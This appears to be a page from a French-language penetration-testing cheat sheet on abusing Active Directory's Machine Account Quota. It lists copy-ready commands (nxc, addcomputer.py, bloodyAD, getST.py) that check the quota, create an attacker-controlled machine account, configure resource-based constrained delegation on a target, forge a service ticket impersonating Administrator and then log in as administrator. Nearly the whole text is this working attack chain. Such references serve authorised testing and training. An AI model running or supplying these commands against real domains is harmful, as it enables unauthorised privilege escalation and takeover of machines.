Exploitation

MAQ Abuse

Créer un compte machine via MAQ et l'utiliser pour une chaîne RBCD vers Admin local.

Copy command
nxc ldap $DC -u $USER -p $PASS -M maq

Description: Vérifier la Machine Account Quota : si > 0, tout utilisateur peut créer des comptes machine.

Copy command
addcomputer.py -computer-name '$NEWPC$' -computer-pass '$PASS' -dc-ip $DC $DOMAIN/$USER:$PASS

Description: Créer un compte machine contrôlé : base pour les attaques RBCD et Kerberos.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add computer '$NEWPC$' '$PASS'

Description: Alternative bloodyAD pour créer un compte machine via LDAP.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add rbcd '$TARGET_COMPUTER$' '$NEWPC$'

Description: Configurer RBCD depuis notre machine vers la cible : prérequis pour S4U2Proxy.

Copy command
getST.py -spn cifs/$TARGET.$DOMAIN -impersonate Administrator -dc-ip $DC $DOMAIN/'$NEWPC$':$PASS

Description: Générer un ST impersonant Administrator sur la cible via RBCD depuis notre machine.

Copy command
nxc smb $TARGET -u Administrator -p '' --use-kcache

Description: Utiliser le ticket ccache résultant pour accéder à la machine cible en Admin.